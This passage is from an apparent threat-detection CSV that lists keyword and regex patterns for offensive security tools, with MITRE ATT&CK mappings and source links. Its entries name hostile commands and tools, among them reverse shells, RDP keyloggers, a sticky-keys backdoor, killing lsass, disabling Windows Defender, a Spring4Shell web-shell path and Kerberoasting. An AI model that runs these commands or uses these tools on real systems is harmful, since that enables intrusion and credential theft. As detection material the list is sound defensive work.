multiple (non-English) languages. common problem occurring from scraped employee names lists (e.g. from Linkedin)","T1078 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/t3l3machus/BabelStrike","1","1","N/A","1","2","110","22","2023-12-16T13:51:54Z","2023-01-10T07:59:00Z" "*t3l3machus/hoaxshell*",".{0,1000}t3l3machus\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*t3l3machus/Synergy-httpx*",".{0,1000}t3l3machus\/Synergy\-httpx.{0,1000}","offensive_tool_keyword","Synergy-httpx","A Python http(s) server designed to assist in red teaming activities such as receiving intercepted data via POST requests and serving content dynamically","T1021.002 - T1105 - T1090","TA0002 - TA0011 - TA0005","N/A","N/A","Data Exfiltration","https://github.com/t3l3machus/Synergy-httpx","1","1","N/A","8","2","117","18","2023-09-09T10:38:38Z","2023-06-02T10:06:41Z" "*TailorScan.exe *",".{0,1000}TailorScan\.exe\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","0","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_darwin*",".{0,1000}TailorScan_darwin.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_freebsd*",".{0,1000}TailorScan_freebsd.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_linux_*",".{0,1000}TailorScan_linux_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_netbsd_*",".{0,1000}TailorScan_netbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_openbsd_*",".{0,1000}TailorScan_openbsd_.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TailorScan_windows_*.exe*",".{0,1000}TailorScan_windows_.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Self-use suture monster intranet scanner - supports port scanning - identifying services - getting title - scanning multiple network cards - ms17010 scanning - icmp survival detection","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/uknowsec/TailorScan","1","1","N/A","10","10","277","47","2020-11-12T08:29:11Z","2020-11-09T07:38:16Z" "*TakahiroHaruyama/VDR*",".{0,1000}TakahiroHaruyama\/VDR.{0,1000}","offensive_tool_keyword","VDR","Vulnerable driver research tool - result and exploit PoCs","T1547.009 - T1210 - T1068 - T1055","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/TakahiroHaruyama/VDR","1","1","N/A","10","2","160","29","2023-11-01T00:06:55Z","2023-10-23T08:34:44Z" "*take_shellcode.bat*",".{0,1000}take_shellcode\.bat.{0,1000}","offensive_tool_keyword","WinShellcode","It's a C code project created in Visual Studio that helps you generate shellcode from your C code.","T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027","TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DallasFR/WinShellcode","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*TakeMyRDP*logfile.txt*",".{0,1000}TakeMyRDP.{0,1000}logfile\.txt.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","2","100","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" "*TakeMyRDP.cpp*",".{0,1000}TakeMyRDP\.cpp.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.exe*",".{0,1000}TakeMyRDP\.exe.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.git*",".{0,1000}TakeMyRDP\.git.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.h*",".{0,1000}TakeMyRDP\.h.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","2","100","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" "*TakeMyRDP.sln*",".{0,1000}TakeMyRDP\.sln.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP.vcxproj*",".{0,1000}TakeMyRDP\.vcxproj.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*TakeMyRDP2.0*",".{0,1000}TakeMyRDP2\.0.{0,1000}","offensive_tool_keyword","TakeMyRDP","An updated version of keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/nocerainfosec/TakeMyRDP2.0","1","1","N/A","N/A","2","100","8","2023-07-27T03:10:08Z","2023-07-03T12:48:49Z" "*TakeMyRDP-main*",".{0,1000}TakeMyRDP\-main.{0,1000}","offensive_tool_keyword","TakeMyRDP","A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes","T1056.001 - T1021.001 - T1057","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/TheD1rkMtr/TakeMyRDP","1","1","N/A","N/A","4","364","61","2023-08-02T02:23:28Z","2023-07-02T17:25:33Z" "*takeown /f ""%systemroot%\System32\smartscreen.exe"" /a*",".{0,1000}takeown\s\/f\s\""\%systemroot\%\\System32\\smartscreen\.exe\""\s\/a.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*takeown /f c:\windows\system32\sethc.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethc\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*takeown /f c:\windows\system32\sethcold.exe*",".{0,1000}takeown\s\/f\sc\:\\windows\\system32\\sethcold\.exe.{0,1000}","offensive_tool_keyword","WinPirate","automated sticky keys backdoor + credentials harvesting","T1547.001 - T1546.008 - T1555.003 - T1059 - T1573 - T1070.004 - T1003","TA0003 - TA0005 - TA0006","N/A","N/A","Persistence","https://github.com/l3m0n/WinPirate","1","0","N/A","9","1","12","32","2016-07-17T20:02:07Z","2016-07-18T03:40:13Z" "*tanc7/EXOCET-AV-Evasion*",".{0,1000}tanc7\/EXOCET\-AV\-Evasion.{0,1000}","offensive_tool_keyword","EXOCET-AV-Evasion","EXOCET - AV-evading undetectable payload delivery tool","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/tanc7/EXOCET-AV-Evasion","1","1","N/A","10","8","789","146","2022-08-16T02:58:39Z","2020-07-15T06:55:13Z" "*Taonn/EmailAll*",".{0,1000}Taonn\/EmailAll.{0,1000}","offensive_tool_keyword","EmailAll","EmailAll is a powerful Email Collect tool","T1114.001 - T1113 - T1087.003","TA0009 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Taonn/EmailAll","1","1","N/A","6","7","627","110","2022-03-04T10:36:41Z","2022-02-14T06:55:30Z" "*target/debug/wstunnel*",".{0,1000}target\/debug\/wstunnel.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","0","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*target/tomcatwar.jsp?pwd=j&cmd=*",".{0,1000}target\/tomcatwar\.jsp\?pwd\=j\&cmd\=.{0,1000}","offensive_tool_keyword","spring-core-rce","CVE-2022-22965 : about spring core rce","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/Mr-xn/spring-core-rce","1","0","N/A","N/A","1","51","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z" "*TARGET=evilginx*",".{0,1000}TARGET\=evilginx.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/kgretzky/evilginx2","1","0","N/A","10","10","9938","1813","2024-05-01T02:57:08Z","2018-07-10T09:59:52Z" "*targetedKerberoast.git*",".{0,1000}targetedKerberoast\.git.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*targetedKerberoast.py*",".{0,1000}targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*targetedkerberoast_attack*",".{0,1000}targetedkerberoast_attack.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*targetedkerberoast_hashes_*.txt*",".{0,1000}targetedkerberoast_hashes_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*targetedkerberoast_output_*.txt*",".{0,1000}targetedkerberoast_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*targetedKerberoast-main*",".{0,1000}targetedKerberoast\-main.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*targetver.h*",".{0,1000}targetver\.h.{0,1000}","offensive_tool_keyword","POC","CVE-2022-21882 win32k LPE bypass CVE-2021-1732","T1068","TA0004","N/A","N/A","Exploitation tools","https://github.com/KaLendsi/CVE-2022-21882","1","0","N/A","N/A","5","458","134","2022-01-27T04:18:18Z","2022-01-27T03:44:10Z" "*TartarusGate-master*",".{0,1000}TartarusGate\-master.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*tarunkant/Gopherus*",".{0,1000}tarunkant\/Gopherus.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*tas389.ps1*",".{0,1000}tas389\.ps1.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Tasked Beacon to escalate to SYSTEM*",".{0,1000}Tasked\sBeacon\sto\sescalate\sto\sSYSTEM.{0,1000}","offensive_tool_keyword","godpotato","GodPotato is an advanced privilege escalation tool that utilizes research on DCOM and builds upon years of Potato techniques. It enables privilege escalation to NT AUTHORITY\SYSTEM on Windows systems from 2012 to 2022 by leveraging the ImpersonatePrivilege permission. It addresses limitations of previous Potato versions and can run on almost any Windows OS by exploiting rpcss vulnerabilities.","T1055.012 - T1053.005 - T1047","TA0005 - TA0002 - TA0008","N/A","N/A","Privilege Escalation","https://github.com/weaselsec/GodPotato-Aggressor-Script","1","0","N/A","10","1","81","8","2024-01-02T00:22:03Z","2024-01-02T00:02:54Z" "*taskkill /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","offensive_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /IM msiexec.exe*",".{0,1000}taskkill\s\/F\s\/IM\smsiexec\.exe.{0,1000}","offensive_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill /F /T /IM keepass.exe /FI*",".{0,1000}taskkill\s\/F\s\/T\s\/IM\skeepass\.exe\s\/FI.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*taskkill /IM tor.exe /F*",".{0,1000}taskkill\s\/IM\stor\.exe\s\/F.{0,1000}","offensive_tool_keyword","torproject","Browse Privately. Explore Freely. Defend yourself against tracking and surveillance. Circumvent censorship.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0001 - TA0002 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","torproject.org","1","0","N/A","9","10","N/A","N/A","N/A","N/A" "*taskkill.exe /F /IM lsass.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\slsass\.exe.{0,1000}","offensive_tool_keyword","taskkill","killing lsass process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://x.com/malmoeb/status/1741114854037987437","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*taskkill.exe /F /IM msiexec.exe*",".{0,1000}taskkill\.exe\s\/F\s\/IM\smsiexec\.exe.{0,1000}","offensive_tool_keyword","taskkill","evade EDR/AV by repairing with msiexec and killing the process","T1489 - T1569.002","TA0040 - TA0005","N/A","N/A","Defense Evasion","https://badoption.eu/blog/2024/03/23/cortex.html","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*tasklist /fi *Imagename eq lsass.exe* | find *lsass*",".{0,1000}tasklist\s\/fi\s.{0,1000}Imagename\seq\slsass\.exe.{0,1000}\s\|\sfind\s.{0,1000}lsass.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*TaskShell.exe * -b *.exe*",".{0,1000}TaskShell\.exe\s.{0,1000}\s\-b\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","tamper scheduled task with a binary","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 